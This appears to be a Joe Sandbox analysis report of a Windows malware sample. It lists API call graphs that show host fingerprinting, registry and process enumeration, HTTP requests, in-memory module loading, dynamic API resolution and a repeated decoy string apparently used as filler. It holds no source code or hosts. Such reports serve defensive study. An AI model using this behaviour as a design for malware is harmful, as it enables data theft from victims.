4 API calls 15226 a6221f 15225->15226 15227 a6a8a0 lstrcpy 15226->15227 15228 a62228 15227->15228 15229 a6a9b0 4 API calls 15228->15229 15230 a62247 15229->15230 15231 a6a8a0 lstrcpy 15230->15231 15232 a62250 15231->15232 15233 a6a9b0 4 API calls 15232->15233 15234 a62270 15233->15234 15235 a6a8a0 lstrcpy 15234->15235 15236 a62279 15235->15236 15815 a68100 GetProcessHeap RtlAllocateHeap 15236->15815 15239 a6a9b0 4 API calls 15240 a62299 15239->15240 15241 a6a8a0 lstrcpy 15240->15241 15242 a622a2 15241->15242 15243 a6a9b0 4 API calls 15242->15243 15244 a622c1 15243->15244 15245 a6a8a0 lstrcpy 15244->15245 15246 a622ca 15245->15246 15247 a6a9b0 4 API calls 15246->15247 15248 a622eb 15247->15248 15249 a6a8a0 lstrcpy 15248->15249 15250 a622f4 15249->15250 15821 a687c0 15250->15821 15253 a6a920 3 API calls 15254 a6231e 15253->15254 15255 a6a8a0 lstrcpy 15254->15255 15256 a62327 15255->15256 15257 a6a9b0 4 API calls 15256->15257 15258 a62351 15257->15258 15259 a6a8a0 lstrcpy 15258->15259 15260 a6235a 15259->15260 15261 a6a9b0 4 API calls 15260->15261 15262 a6237a 15261->15262 15263 a6a8a0 lstrcpy 15262->15263 15264 a62383 15263->15264 15265 a6a9b0 4 API calls 15264->15265 15266 a623a2 15265->15266 15267 a6a8a0 lstrcpy 15266->15267 15268 a623ab 15267->15268 15826 a681f0 15268->15826 15270 a623c2 15271 a6a920 3 API calls 15270->15271 15272 a623d5 15271->15272 15273 a6a8a0 lstrcpy 15272->15273 15274 a623de 15273->15274 15275 a6a9b0 4 API calls 15274->15275 15276 a6240a 15275->15276 15277 a6a8a0 lstrcpy 15276->15277 15278 a62413 15277->15278 15279 a6a9b0 4 API calls 15278->15279 15280 a62432 15279->15280 15281 a6a8a0 lstrcpy 15280->15281 15282 a6243b 15281->15282 15283 a6a9b0 4 API calls 15282->15283 15284 a6245c 15283->15284 15285 a6a8a0 lstrcpy 15284->15285 15286 a62465 15285->15286 15287 a6a9b0 4 API calls 15286->15287 15288 a62484 15287->15288 15289 a6a8a0 lstrcpy 15288->15289 15290 a6248d 15289->15290 15291 a6a9b0 4 API calls 15290->15291 15292 a624ae 15291->15292 15293 a6a8a0 lstrcpy 15292->15293 15294 a624b7 15293->15294 15834 a68320 15294->15834 15296 a624d3 15297 a6a920 3 API calls 15296->15297 15298 a624e6 15297->15298 15299 a6a8a0 lstrcpy 15298->15299 15300 a624ef 15299->15300 15301 a6a9b0 4 API calls 15300->15301 15302 a62519 15301->15302 15303 a6a8a0 lstrcpy 15302->15303 15304 a62522 15303->15304 15305 a6a9b0 4 API calls 15304->15305 15306 a62543 15305->15306 15307 a6a8a0 lstrcpy 15306->15307 15308 a6254c 15307->15308 15309 a68320 17 API calls 15308->15309 15310 a62568 15309->15310 15311 a6a920 3 API calls 15310->15311 15312 a6257b 15311->15312 15313 a6a8a0 lstrcpy 15312->15313 15314 a62584 15313->15314 15315 a6a9b0 4 API calls 15314->15315 15316 a625ae 15315->15316 15317 a6a8a0 lstrcpy 15316->15317 15318 a625b7 15317->15318 15319 a6a9b0 4 API calls 15318->15319 15320 a625d6 15319->15320 15321 a6a8a0 lstrcpy 15320->15321 15322 a625df 15321->15322 15323 a6a9b0 4 API calls 15322->15323 15324 a62600 15323->15324 15325 a6a8a0 lstrcpy 15324->15325 15326 a62609 15325->15326 15870 a68680 15326->15870 15328 a62620 15329 a6a920 3 API calls 15328->15329 15330 a62633 15329->15330 15331 a6a8a0 lstrcpy 15330->15331 15332 a6263c 15331->15332 15333 a6265a lstrlen 15332->15333 15334 a6266a 15333->15334 15335 a6a740 lstrcpy 15334->15335 15336 a6267c 15335->15336 15337 a51590 lstrcpy 15336->15337 15338 a6268d 15337->15338 15880 a65190 15338->15880 15340 a62699 15340->13772 16068 a6aad0 15341->16068 15343 a55009 InternetOpenUrlA 15347 a55021 15343->15347 15344 a550a0 InternetCloseHandle InternetCloseHandle 15346 a550ec 15344->15346 15345 a5502a InternetReadFile 15345->15347 15346->13776 15347->15344 15347->15345 16069 a598d0 15348->16069 15350 a60759 15351 a6077d 15350->15351 15352 a60a38 15350->15352 15354 a60799 StrCmpCA 15351->15354 15353 a51590 lstrcpy 15352->15353 15355 a60a49 15353->15355 15357 a607a8 15354->15357 15358 a60843 15354->15358 16245 a60250 15355->16245 15360 a6a7a0 lstrcpy 15357->15360 15361 a60865 StrCmpCA 15358->15361 15362 a607c3 15360->15362 15364 a60874 15361->15364 15400 a6096b 15361->15400 15363 a51590 lstrcpy 15362->15363 15365 a6080c 15363->15365 15366 a6a740 lstrcpy 15364->15366 15367 a6a7a0 lstrcpy 15365->15367 15369 a60881 15366->15369 15370 a60823 15367->15370 15368 a6099c StrCmpCA 15371 a60a2d 15368->15371 15372 a609ab 15368->15372 15373 a6a9b0 4 API calls 15369->15373 15374 a6a7a0 lstrcpy 15370->15374 15371->13780 15375 a51590 lstrcpy 15372->15375 15376 a608ac 15373->15376 15378 a6083e 15374->15378 15379 a609f4 15375->15379 15377 a6a920 3 API calls 15376->15377 15380 a608b3 15377->15380 16072 a5fb00 15378->16072 15382 a6a7a0 lstrcpy 15379->15382 15384 a6a9b0 4 API calls 15380->15384 15383 a60a0d 15382->15383 15385 a6a7a0 lstrcpy 15383->15385 15386 a608ba 15384->15386 15387 a60a28 15385->15387 15388 a6a8a0 lstrcpy 15386->15388 15400->15368 15720 a6a7a0 lstrcpy 15719->15720 15721 a51683 15720->15721 15722 a6a7a0 lstrcpy 15721->15722 15723 a51695 15722->15723 15724 a6a7a0 lstrcpy 15723->15724 15725 a516a7 15724->15725 15726 a6a7a0 lstrcpy 15725->15726 15727 a515a3 15726->15727 15727->14603 15729 a547c6 15728->15729 15730 a54838 lstrlen 15729->15730 15754 a6aad0 15730->15754 15732 a54848 InternetCrackUrlA 15733 a54867 15732->15733 15733->14680 15735 a6a740 lstrcpy 15734->15735 15736 a68b74 15735->15736 15737 a6a740 lstrcpy 15736->15737 15738 a68b82 GetSystemTime 15737->15738 15740 a68b99 15738->15740 15739 a6a7a0 lstrcpy 15741 a68bfc 15739->15741 15740->15739 15741->14695 15744 a6a931 15742->15744 15743 a6a988 15745 a6a7a0 lstrcpy 15743->15745 15744->15743 15746 a6a968 lstrcpy lstrcat 15744->15746 15747 a6a994 15745->15747 15746->15743 15747->14698 15748->14813 15750 a59af9 LocalAlloc 15749->15750 15751 a54eee 15749->15751 15750->15751 15752 a59b14 CryptStringToBinaryA 15750->15752 15751->14701 15751->14705 15752->15751 15753 a59b39 LocalFree 15752->15753 15753->15751 15754->15732 15755->14823 15756->14964 15757->14966 15758->14974 15887 a677a0 15759->15887 15762 a676c6 RegOpenKeyExA 15764 a676e7 RegQueryValueExA 15762->15764 15765 a67704 RegCloseKey 15762->15765 15763 a61c1e 15763->15056 15764->15765 15765->15763 15767 a61c99 15766->15767 15767->15070 15769 a61e09 15768->15769 15769->15112 15771 a67a9a wsprintfA 15770->15771 15772 a61e84 15770->15772 15771->15772 15772->15126 15774 a61efe 15773->15774 15775 a67b4d 15773->15775 15774->15140 15894 a68d20 LocalAlloc CharToOemW 15775->15894 15778 a6a740 lstrcpy 15777->15778 15779 a67bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15778->15779 15788 a67c25 15779->15788 15780 a67c46 GetLocaleInfoA 15780->15788 15781 a67d18 15782 a67d1e LocalFree 15781->15782 15783 a67d28 15781->15783 15782->15783 15784 a6a7a0 lstrcpy 15783->15784 15787 a67d37 15784->15787 15785 a6a9b0 lstrcpy lstrlen lstrcpy lstrcat 15785->15788 15786 a6a8a0 lstrcpy 15786->15788 15787->15153 15788->15780 15788->15781 15788->15785 15788->15786 15790 a62008 15789->15790 15790->15168 15792 a694b5 15791->15792 15793 a69493 GetModuleFileNameExA CloseHandle 15791->15793 15794 a6a740 lstrcpy 15792->15794 15793->15792 15795 a62091 15794->15795 15795->15183 15797 a62119 15796->15797 15798 a67e68 RegQueryValueExA 15796->15798 15797->15197 15799 a67e8e RegCloseKey 15798->15799 15799->15797 15801 a67fb9 GetLogicalProcessorInformationEx 15800->15801 15802 a67fd8 GetLastError 15801->15802 15803 a68029 15801->15803 15805 a68022 15802->15805 15812 a67fe3 15802->15812 15807 a689f0 2 API calls 15803->15807 15808 a689f0 2 API calls 15805->15808 15809 a62194 15805->15809 15810 a6807b 15807->15810 15808->15809 15809->15211 15810->15805 15811 a68084 wsprintfA 15810->15811 15811->15809 15812->15801 15812->15809 15895 a689f0 15812->15895 15898 a68a10 GetProcessHeap RtlAllocateHeap 15812->15898 15814 a6220f 15813->15814 15814->15225 15816 a689b0 15815->15816 15817 a6814d GlobalMemoryStatusEx 15816->15817 15820 a68163 __aulldiv 15817->15820 15818 a6819b wsprintfA 15819 a62289 15818->15819 15819->15239 15820->15818 15822 a687fb GetProcessHeap RtlAllocateHeap wsprintfA 15821->15822 15824 a6a740 lstrcpy 15822->15824 15825 a6230b 15824->15825 15825->15253 15827 a6a740 lstrcpy 15826->15827 15833 a68229 15827->15833 15828 a68263 15830 a6a7a0 lstrcpy 15828->15830 15829 a6a9b0 lstrcpy lstrlen lstrcpy lstrcat 15829->15833 15831 a682dc 15830->15831 15831->15270 15832 a6a8a0 lstrcpy 15832->15833 15833->15828 15833->15829 15833->15832 15835 a6a740 lstrcpy 15834->15835 15836 a6835c RegOpenKeyExA 15835->15836 15837 a683d0 15836->15837 15838 a683ae 15836->15838 15840 a68613 RegCloseKey 15837->15840 15841 a683f8 RegEnumKeyExA 15837->15841 15839 a6a7a0 lstrcpy 15838->15839 15850 a683bd 15839->15850 15842 a6a7a0 lstrcpy 15840->15842 15843 a6860e 15841->15843 15844 a6843f wsprintfA RegOpenKeyExA 15841->15844 15842->15850 15843->15840 15845 a68485 RegCloseKey RegCloseKey 15844->15845 15846 a684c1 RegQueryValueExA 15844->15846 15847 a6a7a0 lstrcpy 15845->15847 15848 a68601 RegCloseKey 15846->15848 15849 a684fa lstrlen 15846->15849 15847->15850 15848->15843 15849->15848 15851 a68510 15849->15851 15850->15296 15852 a6a9b0 4 API calls 15851->15852 15853 a68527 15852->15853 15854 a6a8a0 lstrcpy 15853->15854 15855 a68533 15854->15855 15856 a6a9b0 4 API calls 15855->15856 15857 a68557 15856->15857 15858 a6a8a0 lstrcpy 15857->15858 15859 a68563 15858->15859 15860 a6856e RegQueryValueExA 15859->15860 15860->15848 15861 a685a3 15860->15861 15862 a6a9b0 4 API calls 15861->15862 15863 a685ba 15862->15863 15864 a6a8a0 lstrcpy 15863->15864 15865 a685c6 15864->15865 15866 a6a9b0 4 API calls 15865->15866 15867 a685ea 15866->15867 15868 a6a8a0 lstrcpy 15867->15868 15869 a685f6 15868->15869 15869->15848 15871 a6a740 lstrcpy 15870->15871 15872 a686bc CreateToolhelp32Snapshot Process32First 15871->15872 15873 a6875d CloseHandle 15872->15873 15874 a686e8 Process32Next 15872->15874 15875 a6a7a0 lstrcpy 15873->15875 15874->15873 15876 a686fd 15874->15876 15877 a68776 15875->15877 15876->15874 15878 a6a9b0 lstrcpy lstrlen lstrcpy lstrcat 15876->15878 15879 a6a8a0 lstrcpy 15876->15879 15877->15328 15878->15876 15879->15876 15881 a6a7a0 lstrcpy 15880->15881 15882 a651b5 15881->15882 15883 a51590 lstrcpy 15882->15883 15884 a651c6 15883->15884 15899 a55100 15884->15899 15886 a651cf 15886->15340 15890 a67720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15887->15890 15889 a676b9 15889->15762 15889->15763 15891 a67765 RegQueryValueExA 15890->15891 15892 a67780 RegCloseKey 15890->15892 15891->15892 15893 a67793 15892->15893 15893->15889 15894->15774 15896 a68a0c 15895->15896 15897 a689f9 GetProcessHeap HeapFree 15895->15897 15896->15812 15897->15896 15898->15812 15900 a6a7a0 lstrcpy 15899->15900 15901 a55119 15900->15901 15902 a547b0 2 API calls 15901->15902 15903 a55125 15902->15903 16059 a68ea0 15903->16059 15905 a55184 15906 a55192 lstrlen 15905->15906 15907 a551a5 15906->15907 15908 a68ea0 4 API calls 15907->15908 15909 a551b6 15908->15909 15910 a6a740 lstrcpy 15909->15910 15911 a551c9 15910->15911 15912 a6a740 lstrcpy 15911->15912 15913 a551d6 15912->15913 15914 a6a740 lstrcpy 15913->15914 15915 a551e3 15914->15915 15916 a6a740 lstrcpy 15915->15916 15917 a551f0 15916->15917 15918 a6a740 lstrcpy 15917->15918 15919 a551fd InternetOpenA StrCmpCA 15918->15919 15920 a5522f 15919->15920 15921 a558c4 InternetCloseHandle 15920->15921 15922 a68b60 3 API calls 15920->15922 15928 a558d9 ctype 15921->15928 15923 a5524e 15922->15923 15924 a6a920 3 API calls 15923->15924 15925 a55261 15924->15925 15926 a6a8a0 lstrcpy 15925->15926 15927 a5526a 15926->15927 15929 a6a9b0 4 API calls 15927->15929 15932 a6a7a0 lstrcpy 15928->15932 15930 a552ab 15929->15930 15931 a6a920 3 API calls 15930->15931 15933 a552b2 15931->15933 15940 a55913 15932->15940 15934 a6a9b0 4 API calls 15933->15934 15935 a552b9 15934->15935 15936 a6a8a0 lstrcpy 15935->15936 15937 a552c2 15936->15937 15938 a6a9b0 4 API calls 15937->15938 15939 a55303 15938->15939 15941 a6a920 3 API calls 15939->15941 15940->15886 15942 a5530a 15941->15942 15943 a6a8a0 lstrcpy 15942->15943 15944 a55313 15943->15944 15945 a55329 InternetConnectA 15944->15945 15945->15921 15946 a55359 HttpOpenRequestA 15945->15946 15948 a558b7 InternetCloseHandle 15946->15948 15949 a553b7 15946->15949 15948->15921 15950 a6a9b0 4 API calls 15949->15950 15951 a553cb 15950->15951 15952 a6a8a0 lstrcpy 15951->15952 15953 a553d4 15952->15953 15954 a6a920 3 API calls 15953->15954 15955 a553f2 15954->15955 15956 a6a8a0 lstrcpy 15955->15956 15957 a553fb 15956->15957 15958 a6a9b0 4 API calls 15957->15958 15959 a5541a 15958->15959 15960 a6a8a0 lstrcpy 15959->15960 15961 a55423 15960->15961 15962 a6a9b0 4 API calls 15961->15962 15963 a55444 15962->15963 15964 a6a8a0 lstrcpy 15963->15964 15965 a5544d 15964->15965 15966 a6a9b0 4 API calls 15965->15966 15967 a5546e 15966->15967 16060 a68ead CryptBinaryToStringA 16059->16060 16061 a68ea9 16059->16061 16060->16061 16062 a68ece GetProcessHeap RtlAllocateHeap 16060->16062 16061->15905 16062->16061 16063 a68ef4 ctype 16062->16063 16064 a68f05 CryptBinaryToStringA 16063->16064 16064->16061 16068->15343 16311 a59880 16069->16311 16071 a598e1 16071->15350 16073 a6a740 lstrcpy 16072->16073 16074 a5fb16 16073->16074 16246 a6a740 lstrcpy 16245->16246 16247 a60266 16246->16247 16248 a68de0 2 API calls 16247->16248 16249 a6027b 16248->16249 16250 a6a920 3 API calls 16249->16250 16251 a6028b 16250->16251 16252 a6a8a0 lstrcpy 16251->16252 16253 a60294 16252->16253 16254 a6a9b0 4 API calls 16253->16254 16312 a5988d 16311->16312 16315 a56fb0 16312->16315 16314 a598ad ctype 16314->16071 16318 a56d40 16315->16318 16319 a56d63 16318->16319 16332 a56d59 16318->16332 16334 a56530 16319->16334 16323 a56dbe 16323->16332 16344 a569b0 16323->16344 16325 a56e2a 16326 a56ee6 VirtualFree 16325->16326 16328 a56ef7 16325->16328 16325->16332 16326->16328 16327 a56f41 16329 a689f0 2 API calls 16327->16329 16327->16332 16328->16327 16330 a56f26 FreeLibrary 16328->16330 16331 a56f38 16328->16331 16329->16332 16330->16328 16333 a689f0 2 API calls 16331->16333 16332->16314 16333->16327 16335 a56542 16334->16335 16337 a56549 16335->16337 16354 a68a10 GetProcessHeap RtlAllocateHeap 16335->16354 16337->16332 16338 a56660 16337->16338 16341 a5668f VirtualAlloc 16338->16341 16340 a56730 16342 a56743 VirtualAlloc 16340->16342 16343 a5673c 16340->16343 16341->16340 16341->16343 16342->16343 16343->16323 16345 a569c9 16344->16345 16350 a569d5 16344->16350 16346 a56a09 LoadLibraryA 16345->16346 16345->16350 16347 a56a32 16346->16347 16346->16350 16349 a56ae0 16347->16349 16355 a68a10 GetProcessHeap RtlAllocateHeap 16347->16355 16349->16350 16351 a56ba8 GetProcAddress 16349->16351 16350->16325 16351->16349 16351->16350 16352 a689f0 2 API calls 16352->16349 16353 a56a8b 16353->16350 16353->16352 16354->16337 16355->16353

                              Executed Functions

                              Function 00A69860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 a69860-a69874 call a69750 663 a69a93-a69af2 LoadLibraryA * 5 660->663 664 a6987a-a69a8e call a69780 GetProcAddress * 21 660->664 666 a69af4-a69b08 GetProcAddress 663->666 667 a69b0d-a69b14 663->667 664->663 666->667 669 a69b46-a69b4d 667->669 670 a69b16-a69b41 GetProcAddress * 2 667->670 671 a69b4f-a69b63 GetProcAddress 669->671 672 a69b68-a69b6f 669->672 670->669 671->672 673 a69b71-a69b84 GetProcAddress 672->673 674 a69b89-a69b90 672->674 673->674 675 a69b92-a69bbc GetProcAddress * 2 674->675 676 a69bc1-a69bc2 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(77190000,014416A8), ref: 00A698A1
                              • GetProcAddress.KERNEL32(77190000,014414F8), ref: 00A698BA
                              • GetProcAddress.KERNEL32(77190000,01441678), ref: 00A698D2
                              • GetProcAddress.KERNEL32(77190000,014416C0), ref: 00A698EA
                              • GetProcAddress.KERNEL32(77190000,01441570), ref: 00A69903
                              • GetProcAddress.KERNEL32(77190000,01448B18), ref: 00A6991B
                              • GetProcAddress.KERNEL32(77190000,01435448), ref: 00A69933
                              • GetProcAddress.KERNEL32(77190000,014356C8), ref: 00A6994C
                              • GetProcAddress.KERNEL32(77190000,01441558), ref: 00A69964
                              • GetProcAddress.KERNEL32(77190000,01441708), ref: 00A6997C
                              • GetProcAddress.KERNEL32(77190000,01441720), ref: 00A69995
                              • GetProcAddress.KERNEL32(77190000,01441528), ref: 00A699AD
                              • GetProcAddress.KERNEL32(77190000,014355A8), ref: 00A699C5
                              • GetProcAddress.KERNEL32(77190000,01441750), ref: 00A699DE
                              • GetProcAddress.KERNEL32(77190000,01441768), ref: 00A699F6
                              • GetProcAddress.KERNEL32(77190000,014356A8), ref: 00A69A0E
                              • GetProcAddress.KERNEL32(77190000,01441540), ref: 00A69A27
                              • GetProcAddress.KERNEL32(77190000,01441618), ref: 00A69A3F
                              • GetProcAddress.KERNEL32(77190000,014356E8), ref: 00A69A57
                              • GetProcAddress.KERNEL32(77190000,014418A0), ref: 00A69A70
                              • GetProcAddress.KERNEL32(77190000,014355C8), ref: 00A69A88
                              • LoadLibraryA.KERNEL32(01441858,?,00A66A00), ref: 00A69A9A
                              • LoadLibraryA.KERNEL32(01441828,?,00A66A00), ref: 00A69AAB
                              • LoadLibraryA.KERNEL32(01441870,?,00A66A00), ref: 00A69ABD
                              • LoadLibraryA.KERNEL32(014418B8,?,00A66A00), ref: 00A69ACF
                              • LoadLibraryA.KERNEL32(014417F8,?,00A66A00), ref: 00A69AE0
                              • GetProcAddress.KERNEL32(76850000,01441810), ref: 00A69B02
                              • GetProcAddress.KERNEL32(77040000,01441840), ref: 00A69B23
                              • GetProcAddress.KERNEL32(77040000,01441888), ref: 00A69B3B
                              • GetProcAddress.KERNEL32(75A10000,01448CF0), ref: 00A69B5D
                              • GetProcAddress.KERNEL32(75690000,01435608), ref: 00A69B7E
                              • GetProcAddress.KERNEL32(776F0000,01448AE8), ref: 00A69B9F
                              • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00A69BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00A69BAA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: f28e8df5523de4609e0ec18d736c5f061de7f3f6a549a88d5ae51dcbd03054ee
                              • Instruction ID: 8d93aba6fb191bce663b45a2bc33b80cf9693f7b294ad783b500221b96b58fc9
                              • Opcode Fuzzy Hash: f28e8df5523de4609e0ec18d736c5f061de7f3f6a549a88d5ae51dcbd03054ee
                              • Instruction Fuzzy Hash: AEA118B5510240AFD344EFA9ED8DB6E3BF9F78C301714851BA609832B4D639A842DBD6
                              Function 00A545C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 a545c0-a54695 RtlAllocateHeap 781 a546a0-a546a6 764->781 782 a546ac-a5474a 781->782 783 a5474f-a547a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A5460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00A5479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A546D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A5473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A546B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A5477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A5471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A545E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A545DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A546C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A545D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A545F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A5475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A546CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A5474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A545C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A5466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A54662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A546AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A5462D
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
